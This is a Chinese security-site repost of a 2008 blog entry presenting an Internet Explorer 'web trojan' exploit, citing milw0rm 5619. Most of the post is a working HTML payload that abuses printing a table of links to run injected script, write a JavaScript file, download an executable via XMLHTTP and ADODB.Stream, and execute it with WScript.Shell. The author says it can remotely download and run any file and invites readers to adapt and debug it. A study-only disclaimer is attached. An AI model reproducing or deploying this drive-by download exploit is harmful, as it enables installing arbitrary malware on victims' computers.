IE0DAY网马 's

admin
admin
admin
139598
文章
114
评论
2017年5月7日21:59:08评论457 views字数 1931阅读6分26秒阅读模式
摘要

鬼仔注:这个漏洞。这个漏洞参考http://www.milw0rm.com/exploits/5619Author: Greysign
2008-5-24
http://www.scanw.com/blog

鬼仔注:这个漏洞

这个漏洞参考http://www.milw0rm.com/exploits/5619

Author: Greysign
2008-5-24
http://www.scanw.com/blog

哈哈。标题吸引吗。
修改代码请注意不能使用双引号”,注意不能跨域,还有一些其他零碎的问题自己调试吧。
这个漏洞执行后可以远程下载任意文件并执行。
第一次写网马,只好拿鸡PP搓成鸡胸,这样垃圾的漏洞才能放出来~哈哈。

不过。这个漏洞利用的好也可以玩一玩的。

<html> <body> Print me with table of links to execute <a href="http://www.bla.com?x=b<script defer > var    ForWriting    =    2; var    strFile    =    'c://test2.js'; var    objFSO    =    new    ActiveXObject('Scripting.FileSystemObject'); var    objStream    =    objFSO.OpenTextFile(strFile,ForWriting,true,false); objStream.WriteLine('var objArgs = /'http://127.0.0.1/test.exe/';'); objStream.WriteLine('var objargss =/'c:////gtest.exe/';'); objStream.WriteLine('var sGet=new ActiveXObject(/'ADODB.Stream/');'); objStream.WriteLine('var xGet = false;'); objStream.WriteLine('try {'); objStream.WriteLine('xGet = new XMLHttpRequest();'); objStream.WriteLine('} '); objStream.WriteLine('catch (trymicrosoft) {'); objStream.WriteLine('try {'); objStream.WriteLine('     xGet = new ActiveXObject(/'Msxml2.XMLHTTP/');'); objStream.WriteLine('} '); objStream.WriteLine('catch (othermicrosoft) {'); objStream.WriteLine('     try {'); objStream.WriteLine('       xGet = new ActiveXObject(/'Microsoft.XMLHTTP/');'); objStream.WriteLine('     } '); objStream.WriteLine('catch (failed) {'); objStream.WriteLine('       xGet = false;'); objStream.WriteLine('     }'); objStream.WriteLine('}'); objStream.WriteLine('}'); objStream.WriteLine('xGet.Open (/'GET/',objArgs.toLowerCase(),0);'); objStream.WriteLine('xGet.Send();'); objStream.WriteLine('sGet.Mode=3;'); objStream.WriteLine('sGet.Type=1;'); objStream.WriteLine('sGet.Open();'); objStream.WriteLine('sGet.Write (xGet.ResponseBody);'); objStream.WriteLine('sGet.SaveToFile (objargss.toLowerCase(),2);'); objStream.WriteLine('var x=new ActiveXObject(/'WScript.Shell/');'); objStream.WriteLine('x.Run(objargss);'); objStream.Close(); var    objShell    =    new    ActiveXObject('wscript.shell'); objShell.Run(strFile); </script>a.c<u>o</u>m"></a> <script>window.print();</script> </body> </html>

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2017年5月7日21:59:08
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   IE0DAY网马 'shttps://cn-sec.com/archives/47831.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息